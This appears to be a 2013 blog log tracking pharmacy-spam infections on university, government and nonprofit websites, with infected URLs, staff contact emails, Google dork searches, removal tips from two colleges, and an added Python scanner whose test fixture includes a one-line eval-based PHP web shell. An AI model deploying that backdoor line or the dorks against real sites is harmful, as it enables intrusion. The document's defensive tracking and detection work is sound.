10. Youngstown State University
14. lyndonstate.edu
23. RUTGERS.EDU
Organization Emails Malicious URL
1. jamescitycountyva.gov
Virginia
webmaster@jamescitycountyva.gov
security@jamescitycountyva.gov
abuse@jamescitycountyva.gov

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CDQQFjABOB4&url=http%3A%2F%2Fwww.jamescitycountyva.gov%2Fonline-viagra%2F&ei=fDaNUs-oNbCQigLY5YGQCg&usg=AFQjCNGum7BrEgfm-MTUdqtWAOpKUwNK3Q&sig2=r2RrerQ90TJAEhAYnWgkkw&bvm=bv.56988011,d.cGE
2. winchester-in.gov
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CDYQFjAAOCg&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=vzeNUpObMYPDigKxvYDADQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=abdmXrXk_PDK9oSUEwxL9Q&bvm=bv.56988011,d.cGE
3. chambersburgpa.gov
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=60&ved=0CHsQFjAJODI&url=http%3A%2F%2Fwww.chambersburgpa.gov%2Foldwebsite%2F&ei=rTiNUqyRL-H8igKS2IC4Cw&usg=AFQjCNG95dpcGUdKYZzkuewl_rhlP0bKfQ&sig2=59F-5abksiA6MquCxtl8IA&bvm=bv.56988011,d.cGE
4. MIT.EDU
Massachusetts
http://ist.mit.edu/security/report
Reported 11-21-13
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CFsQFjAHOAo&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dfirst-viagra-bank%26cc%3D1&ei=JDqNUrbGNeKaiQLhsYC4DQ&usg=AFQjCNHbFel8qG3ng2-65UjEaj3Sv8Q-WQ&sig2=z49trmHODzk0vNW1ED9UOA

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=65&ved=0CEkQFjAEODw&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dviagra-school%26cc%3D1&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNGtatR97iw6yL7pc3OF4Hq_vlRUgQ&sig2=sq2EJRyrM4Lc_nVIAmNxfg

Not notified yet:
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=34&ved=0CD8QFjADOB4&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Fgegr%2Fuploads%2FGEGR%2F%3Ftak%3Dviagra-kaiser%26kt%3D2&ei=9EGOUoftFcj3iwLB_IDIDA&usg=AFQjCNE6iGnyF6l2ImIJIBQttTVv93Xx_Q&sig2=bWETcWcf2KtozulETURyFA

5. keystonescienceschool.org
Colorado
EReid@KeystoneScienceSchool.org
MNuttelman@KeystoneScienceSchool.org
DMiller@KeystoneScienceSchool.org
ASeidler@KeystoneScienceSchool.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE0QFjAE&url=http%3A%2F%2Fkeystonescienceschool.org%2Fslides%2F%3Fm%3D948&ei=4jqNUpbVEqL0iQKizIGgAg&usg=AFQjCNGRTvFfSNMffBSjPLpzzgG68nVx7A&sig2=KRRxaLdF8fKMiR3SzJ0gnQ
6. al-imanschool.org
None https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEQQFjACOAo&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fviagra-online-in-uk.html&ei=LzyNUtn3BeakiQKpy4HQBg&usg=AFQjCNEbYVboigtAtH_wKTKnPGUBLQ8YgA&sig2=rJRdjP-HKkhviEoTVdF0Ag
7. thehomeschoolvillage.com
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGIQFjAHOBQ&url=http%3A%2F%2Fwww.thehomeschoolvillage.com%2F2011%2F02%2Fhigh-school-locker-2.html&ei=xTyNUpLxOcyaigLB7oHgCQ&usg=AFQjCNFjqUPD0DuwSW6G9X-GKEa6t7uJew&sig2=Skh-eaQ0zLtnGFwSLxlNbQ
8. borah.highschoolmedia.org
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=61&ved=0CCsQFjAAODw&url=http%3A%2F%2Fborah.highschoolmedia.org%2Fviagra%2F&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNHhKdwut5QNy56CRqhgkzXsyJAltg&sig2=WI8SoscuejnJVLGdyre-Yg
9. butlercountyrecycles.org
Ohio
None https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fwww.butlercountyrecycles.org%2F%3Fi%3Dlevitracialisviagra&ei=20CNUsmNOqT2iwKlmYCYDw&usg=AFQjCNENtEFWFf1ovZ5MlrNX_vyO5LaRKw&sig2=wAM-hpKyOIo-osTkKRpylw
13. UCSC.EDU
California
help@ucsc.edu
chancellor@ucsc.edu
mdoyle1@ucsc.edu
yiz@soe.ucsc.edu

This page is still infected; notified again 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEkQFjAE&url=http%3A%2F%2Faia-society.ucsc.edu%2F.TemporaryItems%2F%3Fkukogiwa%3DNzA0OA-3D-3D%26tawyxiwa%3Dnews_viagra&ei=ykWNUpq1OoKmigL9w4DwDw&usg=AFQjCNEhu_03DihtVJicOGIIQSA35kPRTQ&sig2=URxafiN5OgOPONZpSBf-Bg

And many, many more infected pages, see

https://www.google.com/#q=site:ucsc.edu+viagra

10. www.ysunews.com
Youngstown State University
Ohio
chair@csis.ysu.edu
ElecCompEng@ysu.edu
police@ysu.edu
techdesk@ysu.edu

Notified 11-21-13

Still infected 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fwww.ysunews.com%2Fcanadian-viagra-prices%2F&ei=lUiNUsXXOYPDigKxvYDADQ&usg=AFQjCNEuPPaPmdqOJRXGVU4_-8smJTZ7ZA&sig2=Zp0yuDz9YDls2dlTQ2RvGA&bvm=bv.56988011,d.cGE
11. theconservationfoundation.org
Illinois
info@theconservationfoundation.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CEcQFjAGOBQ&url=http%3A%2F%2Fwww.theconservationfoundation.org%2Fwhat-we-do%2Feducation.html&ei=3UqNUpzeJYaZiAKg9IDwAg&usg=AFQjCNE1-XldlYZsyNqTmeW67WAsCKxpew&sig2=dtHBJ4ShGAi9A1YbMbt5EA&bvm=bv.56988011,d.cGE
12. naftd.org
North American Fire Training Directors
Washington, DC
naftd@fsi.illinois.edu
Mike.Richwine@fire.ca.gov
bstevens@dhses.ny.gov
billy.shelton@vdfp.virginia.gov

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=46&ved=0CFUQFjAFOCg&url=http%3A%2F%2Fwww.naftd.org%2Fsildenafil-viagra%2F&ei=lEuNUte4BIOsjALeioG4CA&usg=AFQjCNHqhIFNE9uSuPkHzsQEw0-PdwbT-A&sig2=H6O9pB1jRcR52LZ65aKUnQ&bvm=bv.56988011,d.cGE
13. ednf.org
Virginia
ednfstaff@ednf.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CDwQFjACODI&url=http%3A%2F%2Fwww.ednf.org%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D889%26Itemid%3D88888981&ei=jUyNUv2lEOS9iwL_o4CAAQ&usg=AFQjCNFc6I50Q7wbXpDZ1680o3koEfgAVQ&sig2=OWFFlkVIuRMJF7gHU6kkFw&bvm=bv.56988011,d.cGE
14. lyndonstate.edu
Vermont
HelpDesk@lyndonstate.edu
Registrars@lyndonstate.edu
George.Hacking@lyndonstate.edu
Keith.Chamberlin@Lyndonstate.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CC0QFjAAOCg&url=http%3A%2F%2Fmeteorology.lyndonstate.edu%2Fforecast%2Ftime.php%3Fodi%3Donline-canadian-viagra-sales%26on%3D1&ei=Kk6NUubIIo3piwL83YDQDQ&usg=AFQjCNFCPJjKw3fN7-anvj_iKHw6ROTEoQ&sig2=DLswaN_RBMEbi42u7IMMcg&bvm=bv.56988011,d.cGE
15. asu.edu
Arizona
abuse@asu.edu
security@asu.edu
Michael.Crow@asu.edu
dcst@asu.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CGQQFjAIOAo&url=http%3A%2F%2Farchaeology.la.asu.edu%2F_themes%2F_vti_cnf%2Flow.php%3Fp%3Dcanadian-pharmacy-free-viagra&ei=7U-NUrDiPOn5iQLGqYCoAQ&usg=AFQjCNED16sZxd4ahCjN3O2SLZoT0WSHVA&sig2=r5ioL9mE24-tMnimU8kEoQ&bvm=bv.56988011,d.cGE
16. asea.org
Alabama State Employees Association
http://www.asea.org/?p=931
http://www.asea.org/?p=954
http://www.asea.org/?p=2074
http://www.asea.org/?p=842
http://www.asea.org/?p=321
http://www.asea.org/?p=440
17. adelstjohnchurch.org.uk
"Down for maintenance" but malware is still up https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=139&ved=0CGgQFjAIOIIB&url=http%3A%2F%2Fwww.adelstjohnchurch.org.uk%2F4.6.5%2Findex.php%2Fzyrb-viagra-online-ordering.php&ei=OFONUvySO8KciQLxgIGICw&usg=AFQjCNFkbkRRsacMYaMImbhh33lJkSEVTw&sig2=phMUywKSmMtI7v_99utLiA&bvm=bv.56988011,d.cGE
18. tjus.org
Embassy of Tajikistan to the USA
http://www.tjus.org/component/content/article/13-slide-news/133-the-annual-message-of-the-president-of-the-republic-of-tajikistan-he-mr-emomali-rahmon-to-the-majlisi-oli-of-the-republic-of-tajikistan
19. un-grasp.org
United Nations Great Ape Survival Project, Nairobi, Kenya
grasp@unep.org
info@bornfree.org.uk

Notified on 11-25-13

www.un-grasp.org/?p=703
20. http://choctawindians.net/
Choctawhatchee High School
Florida
choctawweb@mail.okaloosa.k12.fl.us
andersonk@mail.okaloosa.k12.fl.us
Katherine.White@mail.okaloosa.k12.fl.us

Notified on 11-25-13

www.choctawindians.net/brand-viagra-online-without-prescription/

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=265&ved=0CEoQFjAEOIQC&url=http%3A%2F%2Fwww.choctawindians.net%2Fbrand-viagra-online-without-prescription%2F&ei=0leNUsKnNcikiQK4qIGQBA&usg=AFQjCNEj2QGhtBnGxfleoXHHksnAeAwzFQ&sig2=AjpeEcNQJ-oe3YqedG-VYA&bvm=bv.56988011,d.cGE

21. http://www.efig.eu.com/
UK
info@efig.org.uk

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=280&ved=0CHcQFjAJOI4C&url=http%3A%2F%2Fwww.efig.eu.com%2Fwhere-to-buy-viagra-in-singapore-pharmacy&ei=MlmNUs-bI-OUiALh7IDADw&usg=AFQjCNGVrrN67AujnfqqqaCmdg8B9h4ahw&sig2=qGqYrHfcXbhhAOihnFJCqw&bvm=bv.56987063,d.cGE
22. http://nyslc.net/
New York State Lifeguard Corps
none https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHIQFjAJ&url=http%3A%2F%2Fnyslc.net%2Findex.php%2Fwtlm-school%2520of%2520pharmacy%2520in%2520ontario%2520canada.php&ei=qVuNUqTaOKe9igKrtIDwDA&usg=AFQjCNG-PDdMqj27QB2GzE5hrn0gwp4tLg&sig2=Hkvo6PIbEVy0kr3_4z53WQ&bvm=bv.56987063,d.cGE
23. RUTGERS.EDU
New Jersey
abuse@RUTGERS.EDU
security@RUTGERS.EDU
colhenry@rci.rutgers.edu
james.breeding@rutgers.edu
phenry@oldqueens.rutgers.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CFwQFjAG&url=http%3A%2F%2Fiamdn.rutgers.edu%2F~chapin%2Fwordpress%2Fwp-content%2Fplugins%2Fakismet%2F%3Fqewosoli%3DODc4%26lajywi%3Dosbon_representative_pump_erectile_dysfunction&ei=2V2NUo-EDaroiwKtzYD4Cg&usg=AFQjCNHXMIhavlNOHGML6advvKev4_eMAA&sig2=RKitik6bOVhEEnaOB4TlnQ&bvm=bv.56987063,d.cGE
24. davisenergy.com
California
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fdavisenergy.com%2F%3Fp%3Duk_viagra&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNGJpKpwKyp8FcyREBZ_7Pkmc1o4UA&sig2=COL7028lufdKNM-1Q92EeA&bvm=bv.56987063,d.cGE
25. iospress.nl
Multinational
editorial@iospress.nl
iospress@accucoms.com
theo@vandebilt.co.uk

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEoQFjAEOAo&url=http%3A%2F%2Fwww.iospress.nl%2Ffemale-viagra-jelly%2F&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNE2Mw3UMfx25HUkPpo9BER0tDPbig&sig2=66GB1Y1UBghBggU53rVI4g&bvm=bv.56987063,d.cGE
26. ctvoterscount.org
Connecticut
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFEQFjAFOAo&url=http%3A%2F%2Fwww.ctvoterscount.org%2F%3Fo%3Da1383&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNG73nDYuVOh706t0AtvgUR4MGiRMA&sig2=lfCRoSwak5DBJ1R_KZkhiA&bvm=bv.56987063,d.cGE
27. al-imanschool.org
New York
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CE4QFjAD&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fcheap-viagra-canadian.html&ei=nJCNUoznL8m3iwKc2IGQCA&usg=AFQjCNGqjNiTWaPPnkq-SobFhj26swhLqg&sig2=knHJ2JPW7GxtvVMXVeTC4Q&bvm=bv.56987063,d.cGE
28. valentinoachakdeng.org
South Sudan
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0CEEQFjABOAo&url=http%3A%2F%2Fwww.valentinoachakdeng.org%2Fblog%2Ftest%2Fmarial-bai-secondary-school-summer-2011%2F&ei=iJGNUrn6FoWWiAL8w4HoCA&usg=AFQjCNGSp0KjbnCJ1dJrAhFbC-4zYBK8wg&sig2=Ga1IKFnBXkIpXo5GtEbLFw&bvm=bv.56987063,d.cGE
29. mlhsss.gov.gy
Guyana
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&ved=0CDsQFjAAOBQ&url=http%3A%2F%2Fwww.mlhsss.gov.gy%2Findex.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D237%3Agovt-to-train-a-further-4000-early-school-leavers-in-2010%26catid%3D9%3Aindustrial-training&ei=l5KNUveuHcWviAKXiIGYAw&usg=AFQjCNEm7SOQ2W01DDi0J6MQVNLueLOO1g&sig2=AbC4eFFgzTCgIvn_iT03hA&bvm=bv.56987063,d.cGE
30. caterpillarsschool.com
India
info@caterpillarschoolschool.com

Notified on 11-25-13

http://caterpillarsschool.com/catpresch/caterpiller/index.php?q=node/1028
31. qomchurch.org
parishoffice@qomchurch.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHsQFjAJOB4&url=http%3A%2F%2Fwww.qomchurch.org%2Ffaith-formation%2Fvacation-bible-school.html&ei=zZONUsGvDMH9iwKhlYCgBg&usg=AFQjCNG-TYVhss0rzMo9rsjIPBAlmJEDgQ&sig2=HrJ5718E0uUTBABIDkIdmg&bvm=bv.56987063,d.cGE
32. alchemytechniques.com
North Carolina
info@alchemytechniques.com

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CEcQFjACODI&url=http%3A%2F%2Fwww.alchemytechniques.com%2Fhealing-school%2Fbeginning-structural-self-inquiry%2F&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGbhPox9rB7RqVRjRV4RcSyxj-lsw&sig2=OvpB88RHAxXTUPV-eQr5qA
33. rabsonmanor.co.uk
info@rabsonmanor.co.uk
http://www.fifthape.co.uk/contact.php

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=58&ved=0CG4QFjAHODI&url=http%3A%2F%2Frabsonmanor.co.uk%2Fhknbcmfhypothyroidismandarrythmiachabans%2Fcullen-trinity-medical-school-st-babaramori-fratus.html&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGhomqReNg7bhyb-jnjGJqocK8LYw&sig2=jfNdgiLi98Jw8epjm72wjw
34. fifthape.co.uk
http://www.fifthape.co.uk/contact.php

Notified on 11-25-13

http://fifthape.co.uk/xdchrockland/patients-have-been-known-to-chew-straight-through-bwsze.html

http://fifthape.co.uk/xdchmetaclopromidejhamper/the-challenge-with-this-life-threatening-disease-systers.html

http://fifthape.co.uk/xdchwheelcartsvertaalde/liposarcomas-in-this-region-as-primary-tumors-a-mesapotamia.html

35. lbhs.ca
Lord Beaverbrook High School, Canada
LordBeaverbrook@cbe.ab.ca
BoardofTrustees@cbe.ab.ca
ChiefSuperintendent@cbe.ab.ca
corpsec@cbe.ab.ca

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=70&ved=0CHwQFjAJODw&url=http%3A%2F%2Fwww.lbhs.ca%2Fschool-clubs%2F&ei=eamNUr9OiISLAty6gOgF&usg=AFQjCNGu3kjLWK21kzW2Vb67M4BlRGa-2A&sig2=u0lxqihtoSB-qzOFalKJYw

36. damselsinsuccess.com
php https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=85&ved=0CEkQFjAEOFA&url=http%3A%2F%2Fwww.damselsinsuccess.com%2Fwhy-some-women-are-taking-back-to-school-instead-of-work%2Fwomen-in-school-mailroom%2F&ei=AauNUsKIJKWUiAKS4YHQDA&usg=AFQjCNGDwTU64fNJbbRQtKqvl05Ws7kZqw&sig2=TyF8HZaMUE-uS_9OJQ5zkg

Uses WordPress 3.7.1 and the plugin WP Missed Schedule 2013.1024.8888; both are up to date. Also uses mailchimp; I cannot determine the version. Uses contact-form-7; I cannot determine the version. Uses the better-related plugin, v. 0.3.5? (current version is 0.4.3.4). Also uses linksalpha.com/widgets/buttons plugins for Facebook Open Graph and Google Plus.

37. starbene.it
php https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=91&ved=0CCsQFjAAOFo&url=http%3A%2F%2Fwww.starbene.it%2Ftag%2Fandrews-dance-school%3Fc3rhc%3D197602&ei=WquNUvHgEaf8iwKMlYHoCA&usg=AFQjCNF2mMnULd70T-lA69hjXRGuyVMqsQ&sig2=HKTFxLQ4PzqxGbmjZee2cQ

38. artloversnewyork.com
nsmith0014@aol.com

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGMQFjAH&url=http%3A%2F%2Fwww.artloversnewyork.com%2Fzine%2Fcategory%2Fthe-bomb%2Fpage%2F14%2F&ei=WK2NUuCYAuSujAKs74GoCQ&usg=AFQjCNE1WXwlWnFy2vOPqz_9I2RK_N71rA&sig2=aMH7-xPXKRj0xAPWG__Kdw&bvm=bv.56987063,d.cGE

WordPress 3.3.2 (current is 3.7.1); no apparent plug-ins

39. auraltimes.com
Blog abandoned since 2007, but still infected
php https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CDoQFjACOAo&url=http%3A%2F%2Fauraltimes.com%2F%3Fp%3Dbuy_viagra_online_canadian_phamacy&ei=MK-NUp-sAeHFigLexYHgAQ&usg=AFQjCNHLukHxXjdzuXervSj6Sb7Vmczotw&sig2=_ELWsjyP_JXDk_Sm05EM9w&bvm=bv.56987063,d.cGE

Timing

The malicious domain securedata24.com was registered on April 1, 2013 for one year:

http://www.whoismind.com/whois/securedata24.com.html

I therefore suspect that this infection comes about by automated exploitation, since there is at least one site that has obviously been abandoned since 2007 that is infected. I doubt the webmaster was clicking on links this year.

I have also seen several infected sites which have had the database crash, which may be due to the infection causing collateral damage.

7. Eight More Sites

I used these Google searches:
intitle:viagra intitle:canadian "information security"
intitle:viagra intitle:kaiser
Organization Emails Malicious URL
1. rip.org.uk
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CF8QFjAF&url=http%3A%2F%2Fwww.rip.org.uk%2Fyqsa-order_viagra_online_canadian_pharmacy.php&ei=PDaOUuiRGIeliQLdkoGIDg&usg=AFQjCNHR4NZhIPhK0OVaojRWpCL20e01cw&sig2=46EQSTSYMkX3xBcLJpqqDg&bvm=bv.56988011,d.cGE
2. cbcmagazine.com
Cleveland, Ohio
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CGIQFjAFOAo&url=http%3A%2F%2Fwww.cbcmagazine.com%2Findex.php%2Ftjem-viagra_generic_paypal_discount.php&ei=eDeOUpGnJ4GwiQKvhYGgBA&usg=AFQjCNGdRhwztb_lZ-SXnRtOkrOHQdwAnQ&sig2=hi1NTXCWOrxRx5mp8YlHOA&bvm=bv.56988011,d.cGE
3. Turkey
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CEkQFjACOBQ&url=http%3A%2F%2Fyenerveyener.com%2Findex.php%2Fdpzt-female%2520viagra%2520order%2520on%2520web.php&ei=ATiOUrGWKMOGjAKf0oHYDQ&usg=AFQjCNG3tUFfORbWJmSAfIfEbTFdNbgvHQ&sig2=fH0bEdmSCIliOPuj8BtFwA&bvm=bv.56988011,d.cGE
4. mcm.edu
Texas
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=36&ved=0CFAQFjAFOB4&url=http%3A%2F%2Fmy.mcm.edu%2F%3FTaki%3Dcheap-viagra-uk-paypal-drug&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNFx5kXmNFD27aHEvZ8IdqL0cEkXOg&sig2=zuc5Zlakv5l8ZKpE9jfEMg&bvm=bv.56988011,d.cGE
5. procue.info
Spain
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGYQFjAIOB4&url=http%3A%2F%2Fwww.procue.info%2Flqks-viagra%2520online%2520canadian%2520pharmacy%2520paypal%2520tablets.php&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNHJ7hxjmOscuDIMFxwi41URdQXt4Q&sig2=bEPeCwyGfW1Vz4TcV0dMhA&bvm=bv.56988011,d.cGE
6. grw.co.nz
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=63&ved=0CD4QFjACODw&url=http%3A%2F%2Fwww.grw.co.nz%2Findex.php%2Fohav-how%2520to%2520get%2520viagra%2520over%2520the%2520counter.php&ei=NDqOUsK_JMvriQLwiYDABQ&usg=AFQjCNF-x9aHVnFahOnHE8M359njMgSFuw&sig2=_v2H5RRDYJQ4Sh5sMMAKZw&bvm=bv.56988011,d.cGE
7. virginia.edu
Virginia
abuse@virginia.edu
security@virginia.edu
compe@virginia.edu
lowe@virginia.edu
patricia@virginia.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIABEBYwCA&url=http%3A%2F%2Fwww.career.virginia.edu%2Ffeeds_old%2Fplaylister%2F%3Fall%3Dviagra-kaiser%26is%3D1&ei=Bz-OUtaVIsaIiAK7roGADQ&usg=AFQjCNGSEjjrariwmaty0iuau_KguJ0pOA&sig2=T9C5pTLrj-PdnkNKRvMvpg&bvm=bv.56988011,d.cGE
8. udg.edu
Spain
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=99&ved=0CGcQFjAIOFo&url=http%3A%2F%2Flequia.udg.edu%2Fold%2Fthickbox%2F%3Frai%3Dkaiser-viagra%26cd%3D2&ei=1kKOUu6ODuOUiAKA1ID4Cw&usg=AFQjCNEfX3T-vDdXde0a4gz-pTJihmG3SQ&sig2=_fXXIY8W0aBSzf0GxyeLMg

8. Removal Tips from KWC

I received this message today (11-21-13) with the first detailed information from an infected college.

Thanks, Jared!

Thank you for your write up on KWC's site infection. We've been working to eradicate the virus, and think we've removed it now. We've been able to temporarily remove it in the past, but it reestablished itself. It also changed in the way it worked after we removed it once, which made it harder to track down. Originally it was using the htaccess file to rewrite browser details to Google and Yahoo, but then it switched to prepend a php file to every page using the php.ini file. There were several other access points they had created using php's eval command to post code to our server. We've, of course, removed those now and taken other preventative steps in the hope that it is gone for good now.

Your write up was very helpful, though, and I'm sharing this with you in the hope that it will help the other sites you've discovered to contain the same issue.

Jared Ehrenheim for KWC.edu

I checked the first ten hits with this search, and they are no longer infected. Looks like KWC has it fixed!
inurl:kwc.edu viagra
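
The message above names three places the infection lived: the .htaccess file, an auto-prepended PHP file configured in php.ini, and PHP files using eval. The following is an added example, not code from KWC or from this page's author: a sweep of a web root for those three artifacts. The exact rule shapes, the file names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
from typing import NamedTuple


class Finding(NamedTuple):
    path: str   # path relative to the scanned root, with forward slashes
    line: int   # 1-based line number
    rule: str   # which persistence mechanism the line resembles


# .htaccess: rewrite conditions keyed on a search-engine referrer or crawler
# user agent (assumed shape of the first stage described in the message).
RE_CLOAK = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_(?:REFERER|USER_AGENT)\}\s+\S*(?:google|yahoo|bing)",
    re.I,
)
# php.ini / .user.ini / .htaccess: auto_prepend_file set to a real file.
RE_PREPEND = re.compile(
    r"^\s*(?:php_value\s+)?auto_prepend_file\s*(?:=|\s)\s*[\"']?([^\s\"';=]+)",
    re.I,
)
# PHP source: eval() fed directly from request data or a decoder.
RE_EVAL = re.compile(
    r"\beval\s*\(\s*[^;]{0,200}?(?:\$_(?:POST|REQUEST|COOKIE)|base64_decode|gzinflate)",
    re.I,
)
PHP_SUFFIXES = (".php", ".phtml", ".inc")


def rules_for(filename):
    """Pick the rules that apply to a file, based on its name."""
    name = filename.lower()
    if name == ".htaccess":
        return [("htaccess-cloak", RE_CLOAK), ("auto-prepend", RE_PREPEND)]
    if name in ("php.ini", ".user.ini"):
        return [("auto-prepend", RE_PREPEND)]
    if name.endswith(PHP_SUFFIXES):
        return [("eval-backdoor", RE_EVAL)]
    return []


def scan_webroot(root):
    """Return sorted Findings for every suspicious line under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):   # os.walk includes dotfiles
        for filename in files:
            rules = rules_for(filename)
            if not rules:
                continue
            full = os.path.join(dirpath, filename)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                for lineno, text in enumerate(fh, 1):
                    for rule, pattern in rules:
                        m = pattern.search(text)
                        if not m:
                            continue
                        # "auto_prepend_file = none" disables the feature.
                        if rule == "auto-prepend" and m.group(1).lower() == "none":
                            continue
                        findings.append(Finding(rel, lineno, rule))
    return sorted(findings)


# Constructed sample tree: three planted artifacts plus benign look-alikes
# (a commented-out directive, an empty directive, a comment mentioning eval).
SAMPLE_TREE = {
    ".htaccess": "RewriteEngine On\n"
                 "RewriteCond %{HTTP_REFERER} (google|yahoo)\\. [NC]\n"
                 "RewriteRule ^(.*)$ /images/cache.php?u=$1 [L]\n",
    "php.ini": "; auto_prepend_file = /old/value.php\n"
               "auto_prepend_file = /var/www/html/images/cache.php\n",
    "docs/.user.ini": "auto_prepend_file =\n",
    "images/cache.php": "<?php eval(base64_decode($_POST['d'])); ?>\n",
    "index.php": "<?php // eval() is never used here\necho 'hello'; ?>\n",
}


def write_sample_tree(root):
    """Materialise SAMPLE_TREE under root so the scanner can be run offline."""
    for rel, body in SAMPLE_TREE.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_tree(tmp)
        for f in scan_webroot(tmp):
            print(f"{f.path}:{f.line}: {f.rule}")
```

A hit is a lead for manual review, not proof of infection; legitimate applications sometimes set auto_prepend_file or call eval.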

9. Removal Tips from UARK

I received this message today (11-21-13) with detailed information from UARK.EDU.

Thanks, Don!

I think your use of Google Dorks is useful, but not definitive. We used to rely heavily on Google Dorks and Google Alerts to keep an eye out for activity like this, but those tools have become increasingly unreliable over the last few years. As a case in point, using the search you offer as an example (modified to single us out):

inurl:uark.edu viagra-online-100mg

We were at first unable to locate any record of defacement (including the site you reported). We later located the following URL (still no sign of your reported site):

www.uark.edu/misc/space/viagra/?id=Buy-Viagra-online-100mg

However, that particular site has been off-line for some time, so any attack would be quite old. Today, the Google search again returns no results.

Another interesting point is that our hacked site did not use securedata24.com for redirect. Instead, it uses keycollector.pw, which was registered on 20 April, near the same time as securedata24.

Again, thank you for taking the time to alert us.

From Don Faulkner

I tested the first ten hits for this dork on 11-21-13, and they were all clean. So I think they got it cleaned off!
inurl:uark.edu viagra

10. Conflicting reports about botnet behavior (11-22-13)

I asked two infected schools if they see remote control signals from the infected machines, and got these replies.

